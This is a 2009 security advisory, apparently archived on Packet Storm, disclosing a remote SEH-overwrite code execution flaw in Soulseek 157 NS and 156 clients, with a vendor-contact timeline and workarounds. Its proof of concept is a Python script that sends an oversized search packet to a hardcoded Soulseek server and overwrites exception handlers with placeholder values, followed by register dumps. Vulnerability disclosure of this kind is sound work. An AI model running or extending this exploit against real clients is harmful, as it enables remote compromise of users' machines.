exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Soulseek 157 NS Code Execution

Soulseek 157 NS Code Execution
Posted May 27, 2009
Authored by laurent gaffie

Soulseek versions 157 NS and 156 suffer from a remote distributed search code execution vulnerability.

tags | exploit, remote, code execution
SHA-256 | 0d11d3312310612caef722fa39eccf0bd1f7d3ea3dd0c509b80de2bbe1813d8f

Soulseek 157 NS Code Execution

Change Mirror Download
=============================================
- Release date: May 24th, 2009
- Discovered by: Laurent GaffiƩ
- Severity: critical
=============================================

I. VULNERABILITY
-------------------------
Soulseek 157 NS * & 156.* Remote Distributed Search Code Execution

II. BACKGROUND
-------------------------
"Soulseek(tm) is a unique ad-free, spyware free, and just plain free file
sharing application.
One of the things that makes Soulseek(tm) unique is our community and
community-related features.
Based on peer-to-peer technology, virtual rooms allow you to meet people
with
the same interests, share information, and chat freely using real-time
messages
in public or private.
Soulseek(tm), with its built-in people matching system, is a great way to
make
new friends and expand your mind!"

III. DESCRIPTION
-------------------------
Soulseek client allows distributed file search to one person, everyone, or
in a
specific Soulseek IRC channel, allowing a user to find the files he wants,
in
a dedicated channel, or with his contacts, or on the whole network.
Unfortunatly this feature is vulnerable to a remote SEH overwrite to a
specific
user, or even to a whole Soulseek IRC channel.

IV. PROOF OF CONCEPT
-------------------------
This proof of concept is made to prevent a S-K party, it is only build to
target the user "testt4321".

To try this proof of concept, you would have to open a soulseek client and
use
the username:
"testt4321"
with the password:
"12345678"
And launch this code.
If you want to change the username or target a whole channel, you would have

to reverse the binary protocol



#!/usr/bin/python
import struct
import sys, socket
from time import *

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("208.76.170.50",2242)) # Change to Port 2240 for 156* branch

buffer = "\x48\x00\x00\x00\x01\x00\x00\x00\x08\x00\x00\x00\x74\x65\x73\x74"
buffer+= "\x34\x33\x32\x31\x08\x00\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38"
buffer+= "\xb5\x00\x00\x00\x20\x00\x00\x00\x38\x65\x39\x31\x66\x37\x33\x30"
buffer+= "\x35\x35\x37\x31\x32\x35\x64\x37\x34\x39\x32\x34\x62\x64\x66\x35"
buffer+= "\x63\x32\x39\x61\x36\x37\x64\x61\x01\x00\x00\x00"

s.send(buffer)
sleep(1)

junk = "\x41" * 3084
next_seh = struct.pack('<L', 0x42424242)
seh = struct.pack('<L', 0x43434343)
other_junk = "\x61" * 1423

buffer2 = "\x01\x0f\x00\x00\x2a\x00\x00\x00\x09\x00\x00\x00\x74\x65\x73\x74"
buffer2+=
"\x74\x34\x33\x32\x31\xa4\x5a\x51\x44\xe8\x0e\x00\x00"+junk+next_seh+seh+other_junk
s.send(buffer2)
sleep(1)
s.recv(1024)



After the query is send, the memory will look like this
0012FBE4 41414141
0012FBE8 42424242 Pointer to next SEH record
0012FBEC 43434343 SE handler
0012FBF0 61616161

And the program will terminate with this structure:
EAX 00000000
ECX 43434343
EDX 7C9132BC ntdll.7C9132BC
EBX 00000000
ESP 0012EA78
EBP 0012EA98
ESI 00000000
EDI 00000000
EIP 43434343


V. BUSINESS IMPACT
-------------------------
An attacker could exploit this vulnerability to compromise any Soulseek
client connected to
the Soulseek network.

VI. SYSTEMS AFFECTED
-------------------------
Windows all versions running Soulseek *

VII. SOLUTION
-------------------------
A fast solution would be to use Nicotine-Plus (
http://nicotine-plus.sourceforge.net/)
a Python Soulseek client.
Another quick workaround (at server level) would be to limit the search
query lenght.

VIII. REFERENCES
-------------------------
http://www.slsknet.org

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent GaffiƩ
Laurent.gaffie{remove-this}(at)gmail.com


X. REVISION HISTORY
-------------------------
May 24, 2009: Initial release


XI. DISCLOSURE TIMELINE
-------------------------
july 29, 2008: Bug discovered
September 03, 2008: Vendor contacted; no response.
October 14, 2008: Vendor contacted; still no response.
April 12, 2009: Idefense contacted.
April 13, 2009: Idefense answered.
April 23, 2009: Advisory send to idefense contributor program.
May 13, 2009: Idefense contacted, bug rejected (no reason given)
May 15, 2009: Idefense recontacted; no answer.
May 16, 2009: Last try to contact Soulseek maintainers
May 24, 2009: Advisory published.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close